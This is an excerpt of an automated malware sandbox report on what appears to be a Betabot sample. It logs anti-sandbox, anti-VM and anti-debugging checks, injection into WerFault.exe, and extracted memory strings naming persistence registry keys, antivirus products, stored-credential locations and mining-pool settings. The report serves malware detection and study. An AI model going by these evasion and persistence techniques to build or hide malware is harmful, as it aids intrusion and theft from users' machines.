Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 0000000C.00000000.345188732.0000000000B88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL_
Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL[BETA]
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_0-310
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	RDTSC instruction interceptor: First address: 0000000000AC45A1 second address: 0000000000AC45A6 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-08h], eax 0x00000005 rdtsc
Source: C:\Windows\SysWOW64\WerFault.exe	RDTSC instruction interceptor: First address: 00000000028645A1 second address: 00000000028645A6 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-08h], eax 0x00000005 rdtsc
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5216	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1064	Thread sleep count: 724 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1064	Thread sleep time: -43440s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5036	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5260	Thread sleep count: 738 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5260	Thread sleep time: -44280s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5468	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4600	Thread sleep count: 720 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4600	Thread sleep time: -43200s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5388	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 760	Thread sleep count: 375 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4356	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5716	Thread sleep count: 696 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5716	Thread sleep time: -41760s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4852	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4940	Thread sleep count: 680 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4940	Thread sleep time: -40800s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1352	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5884	Thread sleep count: 663 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5884	Thread sleep time: -39780s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1248	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1348	Thread sleep count: 631 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1348	Thread sleep time: -37860s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4012	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1916	Thread sleep count: 638 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1916	Thread sleep time: -38280s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4980	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1008	Thread sleep count: 598 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1008	Thread sleep time: -35880s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 3620	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4032	Thread sleep count: 566 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4032	Thread sleep time: -33960s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5484	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5444	Thread sleep count: 552 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5444	Thread sleep time: -33120s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5968	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5504	Thread sleep count: 523 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5504	Thread sleep time: -31380s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1876	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 6072	Thread sleep count: 506 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 6072	Thread sleep time: -30360s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5356	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5296	Thread sleep count: 480 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 272	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 3856	Thread sleep count: 456 > 30
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 2248	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4568	Thread sleep count: 445 > 30
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WerFault.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-318
Source: C:\Windows\SysWOW64\WerFault.exe	Code function: 4_2_02864592 rdtsc	4_2_02864592
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 724
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 738
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 720
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 375
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 696
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 680
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 663
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 631
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 638
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 598
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 566
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 552
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 523
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe	Window / User API: threadDelayed 506
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 480
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 456
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 445
                      Source: C:\Windows\SysWOW64\WerFault.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-24822
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened / queried: VBoxGuestJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened / queried: HGFSJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0286531A GetSystemInfo,4_2_0286531A
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeAPI call chain: ExitProcess graph end nodegraph_0-312
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmpBinary or memory string: Software\VMware, Inc.
                      Source: WerFault.exe, 00000004.00000003.398831506.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398926053.000000000038C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436671619.00000000003C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: yvneslhpc.exe, 00000003.00000002.306354467.0000000000F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                      Source: WerFault.exe, 00000004.00000002.565787499.000000000031F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpz9%SystemRoot%\system32\mswsock.dll
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\services\%sImagePathtooltips_class32%c:\ntusbdriver.sys%c:\*p.exe%c:\%s%c:\p.exe.lnk%WinDir%\explorer.exe /C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnk{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}VisthAux.exesnxhk.dllLanguageSoftware\Valve\SteamMRU0Software\Microsoft\Terminal Server Client\Defaultexplorer.exeSOFTWARE\Classes\originjagexcacheSOFTWARE\Blizzard Entertainment.minecraftLeague of LegendsSoftware\SkypeSoftware\Microsoft\VisualStudioSoftware\VMware, Inc.(unknown)Works! PID: %d, Name: %sBetabot (c) 2012-2014, coded by Userbasedcomctl32.dllGetAddrInfoWGetAddrInfoExWZwOpenProcessZwCreateFileZwOpenFileZwSetValueKeyZwDeleteValueKeySOFTWARE\%sSymantecAviraESETArcaBitavastSpIDerAgentAPVXDWINcmdvirth%08x%s%s\%08X%02Xupdate.microsoft.commicrosoft.comwindowsupdate.microsoft.comJOIN PRIVMSG :USER stratumbtcguildtcp:// -p -u-a scrypt -u http:// -t @svchost.execsrss.exelsass.exesmss.exewscript.execscript.exevbc.exerundll32.exeregsvr32.exe%ALLUSERSPROFILE%SOFTWARE\Microsoft\CurrentVersion\RunSOFTWARE\Microsoft\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystemwinlogon.exeservices.exekernel32.dllSeTcbPrivilege.ini.sys%s\%08x.lnkSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%sdesktop.iniSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsLoadwintrust.dllWinVerifyTrust.rdatachrome.dllcmd_option.%s/c %srunascmd.exeApplications\iexplore.exe\shell\open\commandmsvcrt.dll
                      Source: yvneslhpc.exe, 0000000D.00000002.343818757.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging

Source: C:\Windows\SysWOW64\WerFault.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028660AA NtSetInformationThread 000000FE,00000011,00000000,00000000
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02864592 Start: 028645A1 End: 028645A6
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A64592 Start: 03A645A1 End: 03A645A6
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 6_2_03334592 Start: 033345A1 End: 033345A6
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 7_2_03B64592 Start: 03B645A1 End: 03B645A6
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028664BF LoadLibraryA,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02864592 rdtsc
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Code function: 0_2_00CD120A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Code function: 0_2_00CD1698 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028651F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02885150 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A651F6 mov eax, dword ptr fs:[00000030h]
